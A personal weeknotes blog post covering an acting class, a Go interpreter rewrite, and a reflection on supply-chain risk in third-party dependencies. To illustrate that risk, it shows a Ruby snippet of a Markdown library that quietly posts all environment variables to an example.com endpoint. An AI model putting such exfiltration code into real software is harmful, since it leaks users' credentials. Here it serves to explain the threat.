Weeknotes 2025 W05: Best performance

January 27​–​February 2, 2025
1500 words

Random bits:


Stuff happened with the traffic in Berlin this week:


Earlier this week, I managed to put together the best performance so far in my acting class. I put in a ton of time in preparing the piece, and that effort has paid off.

I’ve got this scene nailed down well enough that I’m looking for new material to take to class. I had the idea of writing something myself, but not only am I a slow writer, I fear that I am far too self-conscious to perform something I’ve written myself.


The progress on my Writing an Interpreter book is slow. I was pondering a rewrite of the primary interpreter last week, and I’ve almost got a parser working in Go. It feels like starting over, and it certainly is a little demotivating.

I’m not using Crystal for the interpreter. It’d be faster to get one up and running — Crystal is quite similar to Ruby after all — but the language has a few drawbacks that bother me enough to not consider it as a programming language for this project:

So, Go is it.


Here is an interesting read about the security and reliability of third-party dependencies in code: Can We Retain the Benefits of Transitive Dependencies Without Undermining Security? (Laurence Tratt, 2024).

This article is of particular interest to me because I have given this topic some thought before. I even started designing a capabilities-secure programming language that would avoid the problem described in Tratt’s article. The core idea is described succinctly by Tratt as follows:

The more dependencies we use within a single process, the less suitable the process is as a security mechanism.

I too consider the process no longer suitable as a security mechanism. Consider a third-party dependency that performs conversion of Markdown source to HTML:

module Markdown
  def self.convert_to_html(source)
    # [snip]
  end
end

There is little to prevent this third-party dependency from accessing the filesystem, the environment, or the network:

module Markdown
  def self.convert_to_html(source)
    uri = URI("http://www.example.com/upload-env")
    res = Net::HTTP.post_form(uri, ENV.to_h)

    # [real implementation here]
  end
end

The environment variables tend to contain sensitive information, such as credentials, and exfiltrating that information, like in the example above, would be of great interest to adversaries.

To the best of my knowledge, this is a problem in every single mainstream programming language.

And yes, I have been thinking about prototyping a capabilities-secure solution on the level of programming languages. But I fear I severely lack the time to explore this properly.


Entertainment:


Links:

Tech links:


  1. I speak German well enough, I should say. I’m not great at it. ↩︎

  2. I was once cycling there and a race car flew past me, blasting me with a shockwave. Yikes. ↩︎

  3. Ruby, which Crystal is distinctly inspired by, doesn’t have one either. ↩︎

  4. Philip K. Dick, The Minority Report (New York: Pantheon Books, 2009). ↩︎

  5. Martin McDonagh, The Pillowman (London: Faber and Faber Plays, 2003). ↩︎

  6. The Pebble model I got was supposed to be water-resistant, but it wasn’t due to a manufacturing defect. I got a refund, weeks before Pebble shut down. ↩︎

  7. I mysteriously lost my Fitbit almost a year ago. Still very strange how that could’ve happened. ↩︎

You can reply to this weeknotes entry by email. I’d love to hear your thoughts!
If you like what I write, stick your email address below and subscribe. I send out my weeknotes every Sunday morning. Alternatively, subscribe to the web feed.
Incoming links: Gripes with Crystal.